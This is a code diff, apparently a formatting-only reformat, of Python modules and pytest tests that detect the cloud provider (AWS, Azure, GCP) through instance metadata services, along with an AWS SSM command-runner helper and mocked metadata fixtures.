# 'instance_id' bad requests
|
||||||
@pytest.fixture
|
@pytest.fixture
|
||||||
def bad_instance_id_request_mock_instance(instance_id_exception):
|
def bad_instance_id_request_mock_instance(instance_id_exception):
|
||||||
return get_test_aws_instance(text={'instance_id': None,
|
return get_test_aws_instance(
|
||||||
'region': AVAILABILITY_ZONE_RESPONSE,
|
text={
|
||||||
'account_id': INSTANCE_IDENTITY_DOCUMENT_RESPONSE},
|
"instance_id": None,
|
||||||
exception={'instance_id': instance_id_exception,
|
"region": AVAILABILITY_ZONE_RESPONSE,
|
||||||
'region': None,
|
"account_id": INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
|
||||||
'account_id': None})
|
},
|
||||||
|
exception={"instance_id": instance_id_exception, "region": None, "account_id": None},
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
@pytest.mark.parametrize('instance_id_exception', [requests.RequestException, IOError])
|
@pytest.mark.parametrize("instance_id_exception", [requests.RequestException, IOError])
|
||||||
def test_is_instance_bad_instance_id_request(bad_instance_id_request_mock_instance):
|
def test_is_instance_bad_instance_id_request(bad_instance_id_request_mock_instance):
|
||||||
assert bad_instance_id_request_mock_instance.is_instance() is False
|
assert bad_instance_id_request_mock_instance.is_instance() is False
|
||||||
|
|
||||||
|
|
||||||
@pytest.mark.parametrize('instance_id_exception', [requests.RequestException, IOError])
|
@pytest.mark.parametrize("instance_id_exception", [requests.RequestException, IOError])
|
||||||
def test_get_cloud_provider_name_bad_instance_id_request(bad_instance_id_request_mock_instance):
|
def test_get_cloud_provider_name_bad_instance_id_request(bad_instance_id_request_mock_instance):
|
||||||
assert bad_instance_id_request_mock_instance.get_cloud_provider_name() == Environment.AWS
|
assert bad_instance_id_request_mock_instance.get_cloud_provider_name() == Environment.AWS
|
||||||
|
|
||||||
|
|
||||||
@pytest.mark.parametrize('instance_id_exception', [requests.RequestException, IOError])
|
@pytest.mark.parametrize("instance_id_exception", [requests.RequestException, IOError])
|
||||||
def test_get_instance_id_bad_instance_id_request(bad_instance_id_request_mock_instance):
|
def test_get_instance_id_bad_instance_id_request(bad_instance_id_request_mock_instance):
|
||||||
assert bad_instance_id_request_mock_instance.get_instance_id() is None
|
assert bad_instance_id_request_mock_instance.get_instance_id() is None
|
||||||
|
|
||||||
|
|
||||||
@pytest.mark.parametrize('instance_id_exception', [requests.RequestException, IOError])
|
@pytest.mark.parametrize("instance_id_exception", [requests.RequestException, IOError])
|
||||||
def test_get_region_bad_instance_id_request(bad_instance_id_request_mock_instance):
|
def test_get_region_bad_instance_id_request(bad_instance_id_request_mock_instance):
|
||||||
assert bad_instance_id_request_mock_instance.get_region() is None
|
assert bad_instance_id_request_mock_instance.get_region() is None
|
||||||
|
|
||||||
|
|
||||||
@pytest.mark.parametrize('instance_id_exception', [requests.RequestException, IOError])
|
@pytest.mark.parametrize("instance_id_exception", [requests.RequestException, IOError])
|
||||||
def test_get_account_id_bad_instance_id_request(bad_instance_id_request_mock_instance):
|
def test_get_account_id_bad_instance_id_request(bad_instance_id_request_mock_instance):
|
||||||
assert bad_instance_id_request_mock_instance.get_account_id() == EXPECTED_ACCOUNT_ID
|
assert bad_instance_id_request_mock_instance.get_account_id() == EXPECTED_ACCOUNT_ID
|
||||||
|
|
||||||
|
@ -189,35 +201,37 @@ def test_get_account_id_bad_instance_id_request(bad_instance_id_request_mock_ins
|
||||||
# 'region' bad requests
|
# 'region' bad requests
|
||||||
@pytest.fixture
|
@pytest.fixture
|
||||||
def bad_region_request_mock_instance(region_exception):
|
def bad_region_request_mock_instance(region_exception):
|
||||||
return get_test_aws_instance(text={'instance_id': INSTANCE_ID_RESPONSE,
|
return get_test_aws_instance(
|
||||||
'region': None,
|
text={
|
||||||
'account_id': INSTANCE_IDENTITY_DOCUMENT_RESPONSE},
|
"instance_id": INSTANCE_ID_RESPONSE,
|
||||||
exception={'instance_id': None,
|
"region": None,
|
||||||
'region': region_exception,
|
"account_id": INSTANCE_IDENTITY_DOCUMENT_RESPONSE,
|
||||||
'account_id': None})
|
},
|
||||||
|
exception={"instance_id": None, "region": region_exception, "account_id": None},
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
@pytest.mark.parametrize('region_exception', [requests.RequestException, IOError])
|
@pytest.mark.parametrize("region_exception", [requests.RequestException, IOError])
|
||||||
def test_is_instance_bad_region_request(bad_region_request_mock_instance):
|
def test_is_instance_bad_region_request(bad_region_request_mock_instance):
|
||||||
assert bad_region_request_mock_instance.is_instance()
|
assert bad_region_request_mock_instance.is_instance()
|
||||||
|
|
||||||
|
|
||||||
@pytest.mark.parametrize('region_exception', [requests.RequestException, IOError])
|
@pytest.mark.parametrize("region_exception", [requests.RequestException, IOError])
|
||||||
def test_get_cloud_provider_name_bad_region_request(bad_region_request_mock_instance):
|
def test_get_cloud_provider_name_bad_region_request(bad_region_request_mock_instance):
|
||||||
assert bad_region_request_mock_instance.get_cloud_provider_name() == Environment.AWS
|
assert bad_region_request_mock_instance.get_cloud_provider_name() == Environment.AWS
|
||||||
|
|
||||||
|
|
||||||
@pytest.mark.parametrize('region_exception', [requests.RequestException, IOError])
|
@pytest.mark.parametrize("region_exception", [requests.RequestException, IOError])
|
||||||
def test_get_instance_id_bad_region_request(bad_region_request_mock_instance):
|
def test_get_instance_id_bad_region_request(bad_region_request_mock_instance):
|
||||||
assert bad_region_request_mock_instance.get_instance_id() == EXPECTED_INSTANCE_ID
|
assert bad_region_request_mock_instance.get_instance_id() == EXPECTED_INSTANCE_ID
|
||||||
|
|
||||||
|
|
||||||
@pytest.mark.parametrize('region_exception', [requests.RequestException, IOError])
|
@pytest.mark.parametrize("region_exception", [requests.RequestException, IOError])
|
||||||
def test_get_region_bad_region_request(bad_region_request_mock_instance):
|
def test_get_region_bad_region_request(bad_region_request_mock_instance):
|
||||||
assert bad_region_request_mock_instance.get_region() is None
|
assert bad_region_request_mock_instance.get_region() is None
|
||||||
|
|
||||||
|
|
||||||
@pytest.mark.parametrize('region_exception', [requests.RequestException, IOError])
|
@pytest.mark.parametrize("region_exception", [requests.RequestException, IOError])
|
||||||
def test_get_account_id_bad_region_request(bad_region_request_mock_instance):
|
def test_get_account_id_bad_region_request(bad_region_request_mock_instance):
|
||||||
assert bad_region_request_mock_instance.get_account_id() == EXPECTED_ACCOUNT_ID
|
assert bad_region_request_mock_instance.get_account_id() == EXPECTED_ACCOUNT_ID
|
||||||
|
|
||||||
|
@ -225,35 +239,37 @@ def test_get_account_id_bad_region_request(bad_region_request_mock_instance):
|
||||||
# 'account_id' bad requests
|
# 'account_id' bad requests
|
||||||
@pytest.fixture
|
@pytest.fixture
|
||||||
def bad_account_id_request_mock_instance(account_id_exception):
|
def bad_account_id_request_mock_instance(account_id_exception):
|
||||||
return get_test_aws_instance(text={'instance_id': INSTANCE_ID_RESPONSE,
|
return get_test_aws_instance(
|
||||||
'region': AVAILABILITY_ZONE_RESPONSE,
|
text={
|
||||||
'account_id': None},
|
"instance_id": INSTANCE_ID_RESPONSE,
|
||||||
exception={'instance_id': None,
|
"region": AVAILABILITY_ZONE_RESPONSE,
|
||||||
'region': None,
|
"account_id": None,
|
||||||
'account_id': account_id_exception})
|
},
|
||||||
|
exception={"instance_id": None, "region": None, "account_id": account_id_exception},
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
@pytest.mark.parametrize('account_id_exception', [requests.RequestException, IOError])
|
@pytest.mark.parametrize("account_id_exception", [requests.RequestException, IOError])
|
||||||
def test_is_instance_bad_account_id_request(bad_account_id_request_mock_instance):
|
def test_is_instance_bad_account_id_request(bad_account_id_request_mock_instance):
|
||||||
assert bad_account_id_request_mock_instance.is_instance()
|
assert bad_account_id_request_mock_instance.is_instance()
|
||||||
|
|
||||||
|
|
||||||
@pytest.mark.parametrize('account_id_exception', [requests.RequestException, IOError])
|
@pytest.mark.parametrize("account_id_exception", [requests.RequestException, IOError])
|
||||||
def test_get_cloud_provider_name_bad_account_id_request(bad_account_id_request_mock_instance):
|
def test_get_cloud_provider_name_bad_account_id_request(bad_account_id_request_mock_instance):
|
||||||
assert bad_account_id_request_mock_instance.get_cloud_provider_name() == Environment.AWS
|
assert bad_account_id_request_mock_instance.get_cloud_provider_name() == Environment.AWS
|
||||||
|
|
||||||
|
|
||||||
@pytest.mark.parametrize('account_id_exception', [requests.RequestException, IOError])
|
@pytest.mark.parametrize("account_id_exception", [requests.RequestException, IOError])
|
||||||
def test_get_instance_id_bad_account_id_request(bad_account_id_request_mock_instance):
|
def test_get_instance_id_bad_account_id_request(bad_account_id_request_mock_instance):
|
||||||
assert bad_account_id_request_mock_instance.get_instance_id() == EXPECTED_INSTANCE_ID
|
assert bad_account_id_request_mock_instance.get_instance_id() == EXPECTED_INSTANCE_ID
|
||||||
|
|
||||||
|
|
||||||
@pytest.mark.parametrize('account_id_exception', [requests.RequestException, IOError])
|
@pytest.mark.parametrize("account_id_exception", [requests.RequestException, IOError])
|
||||||
def test_get_region_bad_account_id_request(bad_account_id_request_mock_instance):
|
def test_get_region_bad_account_id_request(bad_account_id_request_mock_instance):
|
||||||
assert bad_account_id_request_mock_instance.get_region() == EXPECTED_REGION
|
assert bad_account_id_request_mock_instance.get_region() == EXPECTED_REGION
|
||||||
|
|
||||||
|
|
||||||
@pytest.mark.parametrize('account_id_exception', [requests.RequestException, IOError])
|
@pytest.mark.parametrize("account_id_exception", [requests.RequestException, IOError])
|
||||||
def test_get_account_id_bad_account_id_request(bad_account_id_request_mock_instance):
|
def test_get_account_id_bad_account_id_request(bad_account_id_request_mock_instance):
|
||||||
assert bad_account_id_request_mock_instance.get_account_id() is None
|
assert bad_account_id_request_mock_instance.get_account_id() is None
|
||||||
|
|
||||||
|
@ -263,15 +279,15 @@ def test_get_account_id_bad_account_id_request(bad_account_id_request_mock_insta
|
||||||
def not_found_request_mock_instance():
|
def not_found_request_mock_instance():
|
||||||
with requests_mock.Mocker() as m:
|
with requests_mock.Mocker() as m:
|
||||||
# request made to get instance_id
|
# request made to get instance_id
|
||||||
url = f'{AWS_LATEST_METADATA_URI_PREFIX}meta-data/instance-id'
|
url = f"{AWS_LATEST_METADATA_URI_PREFIX}meta-data/instance-id"
|
||||||
m.get(url, status_code=404)
|
m.get(url, status_code=404)
|
||||||
|
|
||||||
# request made to get region
|
# request made to get region
|
||||||
url = f'{AWS_LATEST_METADATA_URI_PREFIX}meta-data/placement/availability-zone'
|
url = f"{AWS_LATEST_METADATA_URI_PREFIX}meta-data/placement/availability-zone"
|
||||||
m.get(url)
|
m.get(url)
|
||||||
|
|
||||||
# request made to get account_id
|
# request made to get account_id
|
||||||
url = f'{AWS_LATEST_METADATA_URI_PREFIX}dynamic/instance-identity/document'
|
url = f"{AWS_LATEST_METADATA_URI_PREFIX}dynamic/instance-identity/document"
|
||||||
m.get(url)
|
m.get(url)
|
||||||
|
|
||||||
not_found_aws_instance_object = AwsInstance()
|
not_found_aws_instance_object = AwsInstance()
|
||||||
|
|
|
@ -3,7 +3,7 @@ from unittest import TestCase
|
||||||
|
|
||||||
from .aws_service import filter_instance_data_from_aws_response
|
from .aws_service import filter_instance_data_from_aws_response
|
||||||
|
|
||||||
__author__ = 'shay.nehmad'
|
__author__ = "shay.nehmad"
|
||||||
|
|
||||||
|
|
||||||
class TestFilterInstanceDataFromAwsResponse(TestCase):
|
class TestFilterInstanceDataFromAwsResponse(TestCase):
|
||||||
|
@ -49,10 +49,10 @@ class TestFilterInstanceDataFromAwsResponse(TestCase):
|
||||||
}
|
}
|
||||||
"""
|
"""
|
||||||
|
|
||||||
self.assertEqual(filter_instance_data_from_aws_response(json.loads(json_response_empty)), [])
|
self.assertEqual(
|
||||||
|
filter_instance_data_from_aws_response(json.loads(json_response_empty)), []
|
||||||
|
)
|
||||||
self.assertEqual(
|
self.assertEqual(
|
||||||
filter_instance_data_from_aws_response(json.loads(json_response_full)),
|
filter_instance_data_from_aws_response(json.loads(json_response_full)),
|
||||||
[{'instance_id': 'string',
|
[{"instance_id": "string", "ip_address": "string", "name": "string", "os": "string"}],
|
||||||
'ip_address': 'string',
|
)
|
||||||
'name': 'string',
|
|
||||||
'os': 'string'}])
|
|
||||||
|
|
|
@ -8,7 +8,9 @@ from common.cloud.instance import CloudInstance
|
||||||
from common.common_consts.timeouts import SHORT_REQUEST_TIMEOUT
|
from common.common_consts.timeouts import SHORT_REQUEST_TIMEOUT
|
||||||
|
|
||||||
LATEST_AZURE_METADATA_API_VERSION = "2019-04-30"
|
LATEST_AZURE_METADATA_API_VERSION = "2019-04-30"
|
||||||
AZURE_METADATA_SERVICE_URL = "http://169.254.169.254/metadata/instance?api-version=%s" % LATEST_AZURE_METADATA_API_VERSION
|
AZURE_METADATA_SERVICE_URL = (
|
||||||
|
"http://169.254.169.254/metadata/instance?api-version=%s" % LATEST_AZURE_METADATA_API_VERSION
|
||||||
|
)
|
||||||
|
|
||||||
logger = logging.getLogger(__name__)
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
@ -18,6 +20,7 @@ class AzureInstance(CloudInstance):
|
||||||
Access to useful information about the current machine if it's an Azure VM.
|
Access to useful information about the current machine if it's an Azure VM.
|
||||||
Based on Azure metadata service: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service
|
Based on Azure metadata service: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service
|
||||||
"""
|
"""
|
||||||
|
|
||||||
def is_instance(self):
|
def is_instance(self):
|
||||||
return self._on_azure
|
return self._on_azure
|
||||||
|
|
||||||
|
@ -34,9 +37,11 @@ class AzureInstance(CloudInstance):
|
||||||
self._on_azure = False
|
self._on_azure = False
|
||||||
|
|
||||||
try:
|
try:
|
||||||
response = requests.get(AZURE_METADATA_SERVICE_URL,
|
response = requests.get(
|
||||||
headers={"Metadata": "true"},
|
AZURE_METADATA_SERVICE_URL,
|
||||||
timeout=SHORT_REQUEST_TIMEOUT)
|
headers={"Metadata": "true"},
|
||||||
|
timeout=SHORT_REQUEST_TIMEOUT,
|
||||||
|
)
|
||||||
|
|
||||||
# If not on cloud, the metadata URL is non-routable and the connection will fail.
|
# If not on cloud, the metadata URL is non-routable and the connection will fail.
|
||||||
# If on AWS, should get 404 since the metadata service URL is different, so bool(response) will be false.
|
# If on AWS, should get 404 since the metadata service URL is different, so bool(response) will be false.
|
||||||
|
@ -46,7 +51,9 @@ class AzureInstance(CloudInstance):
|
||||||
else:
|
else:
|
||||||
logger.warning(f"Metadata response not ok: {response.status_code}")
|
logger.warning(f"Metadata response not ok: {response.status_code}")
|
||||||
except requests.RequestException:
|
except requests.RequestException:
|
||||||
logger.debug("Failed to get response from Azure metadata service: This instance is not on Azure.")
|
logger.debug(
|
||||||
|
"Failed to get response from Azure metadata service: This instance is not on Azure."
|
||||||
|
)
|
||||||
|
|
||||||
def try_parse_response(self, response):
|
def try_parse_response(self, response):
|
||||||
try:
|
try:
|
||||||
|
|
|
@ -3,84 +3,104 @@ import requests
|
||||||
import requests_mock
|
import requests_mock
|
||||||
import simplejson
|
import simplejson
|
||||||
|
|
||||||
from common.cloud.azure.azure_instance import (AZURE_METADATA_SERVICE_URL,
|
from common.cloud.azure.azure_instance import AZURE_METADATA_SERVICE_URL, AzureInstance
|
||||||
AzureInstance)
|
|
||||||
from common.cloud.environment_names import Environment
|
from common.cloud.environment_names import Environment
|
||||||
|
|
||||||
|
|
||||||
GOOD_DATA = {
|
GOOD_DATA = {
|
||||||
'compute': {'azEnvironment': 'AZUREPUBLICCLOUD',
|
"compute": {
|
||||||
'isHostCompatibilityLayerVm': 'true',
|
"azEnvironment": "AZUREPUBLICCLOUD",
|
||||||
'licenseType': 'Windows_Client',
|
"isHostCompatibilityLayerVm": "true",
|
||||||
'location': 'westus',
|
"licenseType": "Windows_Client",
|
||||||
'name': 'examplevmname',
|
"location": "westus",
|
||||||
'offer': 'Windows',
|
"name": "examplevmname",
|
||||||
'osProfile': {'adminUsername': 'admin',
|
"offer": "Windows",
|
||||||
'computerName': 'examplevmname',
|
"osProfile": {
|
||||||
'disablePasswordAuthentication': 'true'},
|
"adminUsername": "admin",
|
||||||
'osType': 'linux',
|
"computerName": "examplevmname",
|
||||||
'placementGroupId': 'f67c14ab-e92c-408c-ae2d-da15866ec79a',
|
"disablePasswordAuthentication": "true",
|
||||||
'plan': {'name': 'planName',
|
},
|
||||||
'product': 'planProduct',
|
"osType": "linux",
|
||||||
'publisher': 'planPublisher'},
|
"placementGroupId": "f67c14ab-e92c-408c-ae2d-da15866ec79a",
|
||||||
'platformFaultDomain': '36',
|
"plan": {"name": "planName", "product": "planProduct", "publisher": "planPublisher"},
|
||||||
'platformUpdateDomain': '42',
|
"platformFaultDomain": "36",
|
||||||
'publicKeys': [{'keyData': 'ssh-rsa 0',
|
"platformUpdateDomain": "42",
|
||||||
'path': '/home/user/.ssh/authorized_keys0'},
|
"publicKeys": [
|
||||||
{'keyData': 'ssh-rsa 1',
|
{"keyData": "ssh-rsa 0", "path": "/home/user/.ssh/authorized_keys0"},
|
||||||
'path': '/home/user/.ssh/authorized_keys1'}],
|
{"keyData": "ssh-rsa 1", "path": "/home/user/.ssh/authorized_keys1"},
|
||||||
'publisher': 'RDFE-Test-Microsoft-Windows-Server-Group',
|
],
|
||||||
'resourceGroupName': 'macikgo-test-may-23',
|
"publisher": "RDFE-Test-Microsoft-Windows-Server-Group",
|
||||||
'resourceId': '/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/resourceGroups/macikgo-test-may-23/'
|
"resourceGroupName": "macikgo-test-may-23",
|
||||||
'providers/Microsoft.Compute/virtualMachines/examplevmname',
|
"resourceId": "/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/resourceGroups/macikgo-test-may-23/"
|
||||||
'securityProfile': {'secureBootEnabled': 'true',
|
"providers/Microsoft.Compute/virtualMachines/examplevmname",
|
||||||
'virtualTpmEnabled': 'false'},
|
"securityProfile": {"secureBootEnabled": "true", "virtualTpmEnabled": "false"},
|
||||||
'sku': 'Windows-Server-2012-R2-Datacenter',
|
"sku": "Windows-Server-2012-R2-Datacenter",
|
||||||
'storageProfile': {'dataDisks': [{'caching': 'None',
|
"storageProfile": {
|
||||||
'createOption': 'Empty',
|
"dataDisks": [
|
||||||
'diskSizeGB': '1024',
|
{
|
||||||
'image': {'uri': ''},
|
"caching": "None",
|
||||||
'lun': '0',
|
"createOption": "Empty",
|
||||||
'managedDisk': {'id': '/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/'
|
"diskSizeGB": "1024",
|
||||||
'resourceGroups/macikgo-test-may-23/providers/'
|
"image": {"uri": ""},
|
||||||
'Microsoft.Compute/disks/exampledatadiskname',
|
"lun": "0",
|
||||||
'storageAccountType': 'Standard_LRS'},
|
"managedDisk": {
|
||||||
'name': 'exampledatadiskname',
|
"id": "/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/"
|
||||||
'vhd': {'uri': ''},
|
"resourceGroups/macikgo-test-may-23/providers/"
|
||||||
'writeAcceleratorEnabled': 'false'}],
|
"Microsoft.Compute/disks/exampledatadiskname",
|
||||||
'imageReference': {'id': '',
|
"storageAccountType": "Standard_LRS",
|
||||||
'offer': 'UbuntuServer',
|
},
|
||||||
'publisher': 'Canonical',
|
"name": "exampledatadiskname",
|
||||||
'sku': '16.04.0-LTS',
|
"vhd": {"uri": ""},
|
||||||
'version': 'latest'},
|
"writeAcceleratorEnabled": "false",
|
||||||
'osDisk': {'caching': 'ReadWrite',
|
}
|
||||||
'createOption': 'FromImage',
|
],
|
||||||
'diskSizeGB': '30',
|
"imageReference": {
|
||||||
'diffDiskSettings': {'option': 'Local'},
|
"id": "",
|
||||||
'encryptionSettings': {'enabled': 'false'},
|
"offer": "UbuntuServer",
|
||||||
'image': {'uri': ''},
|
"publisher": "Canonical",
|
||||||
'managedDisk': {'id': '/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/'
|
"sku": "16.04.0-LTS",
|
||||||
'resourceGroups/macikgo-test-may-23/providers/'
|
"version": "latest",
|
||||||
'Microsoft.Compute/disks/exampleosdiskname',
|
},
|
||||||
'storageAccountType': 'Standard_LRS'},
|
"osDisk": {
|
||||||
'name': 'exampleosdiskname',
|
"caching": "ReadWrite",
|
||||||
'osType': 'Linux',
|
"createOption": "FromImage",
|
||||||
'vhd': {'uri': ''},
|
"diskSizeGB": "30",
|
||||||
'writeAcceleratorEnabled': 'false'}},
|
"diffDiskSettings": {"option": "Local"},
|
||||||
'subscriptionId': 'xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx',
|
"encryptionSettings": {"enabled": "false"},
|
||||||
'tags': 'baz:bash;foo:bar',
|
"image": {"uri": ""},
|
||||||
'version': '15.05.22',
|
"managedDisk": {
|
||||||
'vmId': '02aab8a4-74ef-476e-8182-f6d2ba4166a6',
|
"id": "/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/"
|
||||||
'vmScaleSetName': 'crpteste9vflji9',
|
"resourceGroups/macikgo-test-may-23/providers/"
|
||||||
'vmSize': 'Standard_A3',
|
"Microsoft.Compute/disks/exampleosdiskname",
|
||||||
'zone': ''},
|
"storageAccountType": "Standard_LRS",
|
||||||
'network': {'interface': [{'ipv4': {'ipAddress': [{'privateIpAddress': '10.144.133.132',
|
},
|
||||||
'publicIpAddress': ''}],
|
"name": "exampleosdiskname",
|
||||||
'subnet': [{'address': '10.144.133.128',
|
"osType": "Linux",
|
||||||
'prefix': '26'}]},
|
"vhd": {"uri": ""},
|
||||||
'ipv6': {'ipAddress': []},
|
"writeAcceleratorEnabled": "false",
|
||||||
'macAddress': '0011AAFFBB22'}]}
|
},
|
||||||
}
|
},
|
||||||
|
"subscriptionId": "xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx",
|
||||||
|
"tags": "baz:bash;foo:bar",
|
||||||
|
"version": "15.05.22",
|
||||||
|
"vmId": "02aab8a4-74ef-476e-8182-f6d2ba4166a6",
|
||||||
|
"vmScaleSetName": "crpteste9vflji9",
|
||||||
|
"vmSize": "Standard_A3",
|
||||||
|
"zone": "",
|
||||||
|
},
|
||||||
|
"network": {
|
||||||
|
"interface": [
|
||||||
|
{
|
||||||
|
"ipv4": {
|
||||||
|
"ipAddress": [{"privateIpAddress": "10.144.133.132", "publicIpAddress": ""}],
|
||||||
|
"subnet": [{"address": "10.144.133.128", "prefix": "26"}],
|
||||||
|
},
|
||||||
|
"ipv6": {"ipAddress": []},
|
||||||
|
"macAddress": "0011AAFFBB22",
|
||||||
|
}
|
||||||
|
]
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
BAD_DATA_NOT_JSON = '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/\
|
BAD_DATA_NOT_JSON = '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/\
|
||||||
|
@ -89,7 +109,7 @@ http-equiv="Content-Type" />\n<meta content="no-cache" http-equiv="Pragma" />\n<
|
||||||
javascript">\nvar pageName = \'/\';\ntop.location.replace(pageName);\n</script>\n</head>\n<body> </body>\n</html>\n'
|
javascript">\nvar pageName = \'/\';\ntop.location.replace(pageName);\n</script>\n</head>\n<body> </body>\n</html>\n'
|
||||||
|
|
||||||
|
|
||||||
BAD_DATA_JSON = {'': ''}
|
BAD_DATA_JSON = {"": ""}
|
||||||
|
|
||||||
|
|
||||||
def get_test_azure_instance(url, **kwargs):
|
def get_test_azure_instance(url, **kwargs):
|
||||||
|
@ -114,9 +134,9 @@ def test_get_cloud_provider_name_good_data(good_data_mock_instance):
|
||||||
|
|
||||||
|
|
||||||
def test_try_parse_response_good_data(good_data_mock_instance):
|
def test_try_parse_response_good_data(good_data_mock_instance):
|
||||||
assert good_data_mock_instance.instance_name == GOOD_DATA['compute']['name']
|
assert good_data_mock_instance.instance_name == GOOD_DATA["compute"]["name"]
|
||||||
assert good_data_mock_instance.instance_id == GOOD_DATA['compute']['vmId']
|
assert good_data_mock_instance.instance_id == GOOD_DATA["compute"]["vmId"]
|
||||||
assert good_data_mock_instance.location == GOOD_DATA['compute']['location']
|
assert good_data_mock_instance.location == GOOD_DATA["compute"]["location"]
|
||||||
|
|
||||||
|
|
||||||
# good request, bad data (json)
|
# good request, bad data (json)
|
||||||
|
|
|
@ -16,6 +16,7 @@ class GcpInstance(CloudInstance):
|
||||||
"""
|
"""
|
||||||
Used to determine if on GCP. See https://cloud.google.com/compute/docs/storing-retrieving-metadata#runninggce
|
Used to determine if on GCP. See https://cloud.google.com/compute/docs/storing-retrieving-metadata#runninggce
|
||||||
"""
|
"""
|
||||||
|
|
||||||
def is_instance(self):
|
def is_instance(self):
|
||||||
return self._on_gcp
|
return self._on_gcp
|
||||||
|
|
||||||
|
@ -37,9 +38,17 @@ class GcpInstance(CloudInstance):
|
||||||
logger.warning("Got unexpected GCP Metadata format")
|
logger.warning("Got unexpected GCP Metadata format")
|
||||||
else:
|
else:
|
||||||
if not response.headers["Metadata-Flavor"] == "Google":
|
if not response.headers["Metadata-Flavor"] == "Google":
|
||||||
logger.warning("Got unexpected Metadata flavor: {}".format(response.headers["Metadata-Flavor"]))
|
logger.warning(
|
||||||
|
"Got unexpected Metadata flavor: {}".format(
|
||||||
|
response.headers["Metadata-Flavor"]
|
||||||
|
)
|
||||||
|
)
|
||||||
else:
|
else:
|
||||||
logger.warning("On GCP, but metadata response not ok: {}".format(response.status_code))
|
logger.warning(
|
||||||
|
"On GCP, but metadata response not ok: {}".format(response.status_code)
|
||||||
|
)
|
||||||
except requests.RequestException:
|
except requests.RequestException:
|
||||||
logger.debug("Failed to get response from GCP metadata service: This instance is not on GCP")
|
logger.debug(
|
||||||
|
"Failed to get response from GCP metadata service: This instance is not on GCP"
|
||||||
|
)
|
||||||
self._on_gcp = False
|
self._on_gcp = False
|
||||||
|
|
|
@ -7,6 +7,7 @@ class CloudInstance(object):
|
||||||
|
|
||||||
The current machine can be a cloud instance (for example EC2 instance or Azure VM).
|
The current machine can be a cloud instance (for example EC2 instance or Azure VM).
|
||||||
"""
|
"""
|
||||||
|
|
||||||
def is_instance(self) -> bool:
|
def is_instance(self) -> bool:
|
||||||
raise NotImplementedError()
|
raise NotImplementedError()
|
||||||
|
|
||||||
|
|
|
@ -2,8 +2,8 @@ from enum import Enum
|
||||||
|
|
||||||
|
|
||||||
class CloudProviders(Enum):
|
class CloudProviders(Enum):
|
||||||
AWS = 'aws'
|
AWS = "aws"
|
||||||
AZURE = 'azure'
|
AZURE = "azure"
|
||||||
GCP = 'gcp'
|
GCP = "gcp"
|
||||||
ALIBABA = 'aliyun'
|
ALIBABA = "aliyun"
|
||||||
ORACLE = 'oci'
|
ORACLE = "oci"
|
||||||
|
|
|
@ -1,6 +1,6 @@
|
||||||
from common.cmd.cmd_result import CmdResult
|
from common.cmd.cmd_result import CmdResult
|
||||||
|
|
||||||
__author__ = 'itay.mizeretz'
|
__author__ = "itay.mizeretz"
|
||||||
|
|
||||||
|
|
||||||
class AwsCmdResult(CmdResult):
|
class AwsCmdResult(CmdResult):
|
||||||
|
@ -10,8 +10,11 @@ class AwsCmdResult(CmdResult):
|
||||||
|
|
||||||
def __init__(self, command_info):
|
def __init__(self, command_info):
|
||||||
super(AwsCmdResult, self).__init__(
|
super(AwsCmdResult, self).__init__(
|
||||||
self.is_successful(command_info, True), command_info['ResponseCode'], command_info['StandardOutputContent'],
|
self.is_successful(command_info, True),
|
||||||
command_info['StandardErrorContent'])
|
command_info["ResponseCode"],
|
||||||
|
command_info["StandardOutputContent"],
|
||||||
|
command_info["StandardErrorContent"],
|
||||||
|
)
|
||||||
self.command_info = command_info
|
self.command_info = command_info
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
|
@ -22,4 +25,6 @@ class AwsCmdResult(CmdResult):
|
||||||
:param is_timeout: Whether the given command timed out
|
:param is_timeout: Whether the given command timed out
|
||||||
:return: True if successful, False otherwise.
|
:return: True if successful, False otherwise.
|
||||||
"""
|
"""
|
||||||
return (command_info['Status'] == 'Success') or (is_timeout and (command_info['Status'] == 'InProgress'))
|
return (command_info["Status"] == "Success") or (
|
||||||
|
is_timeout and (command_info["Status"] == "InProgress")
|
||||||
|
)
|
||||||
|
|
|
@ -5,7 +5,7 @@ from common.cmd.aws.aws_cmd_result import AwsCmdResult
|
||||||
from common.cmd.cmd_runner import CmdRunner
|
from common.cmd.cmd_runner import CmdRunner
|
||||||
from common.cmd.cmd_status import CmdStatus
|
from common.cmd.cmd_status import CmdStatus
|
||||||
|
|
||||||
__author__ = 'itay.mizeretz'
|
__author__ = "itay.mizeretz"
|
||||||
|
|
||||||
logger = logging.getLogger(__name__)
|
logger = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
@ -19,7 +19,7 @@ class AwsCmdRunner(CmdRunner):
|
||||||
super(AwsCmdRunner, self).__init__(is_linux)
|
super(AwsCmdRunner, self).__init__(is_linux)
|
||||||
self.instance_id = instance_id
|
self.instance_id = instance_id
|
||||||
self.region = region
|
self.region = region
|
||||||
self.ssm = AwsService.get_client('ssm', region)
|
self.ssm = AwsService.get_client("ssm", region)
|
||||||
|
|
||||||
def query_command(self, command_id):
|
def query_command(self, command_id):
|
||||||
return self.ssm.get_command_invocation(CommandId=command_id, InstanceId=self.instance_id)
|
return self.ssm.get_command_invocation(CommandId=command_id, InstanceId=self.instance_id)
|
||||||
|
@ -28,15 +28,18 @@ class AwsCmdRunner(CmdRunner):
|
||||||
return AwsCmdResult(command_info)
|
return AwsCmdResult(command_info)
|
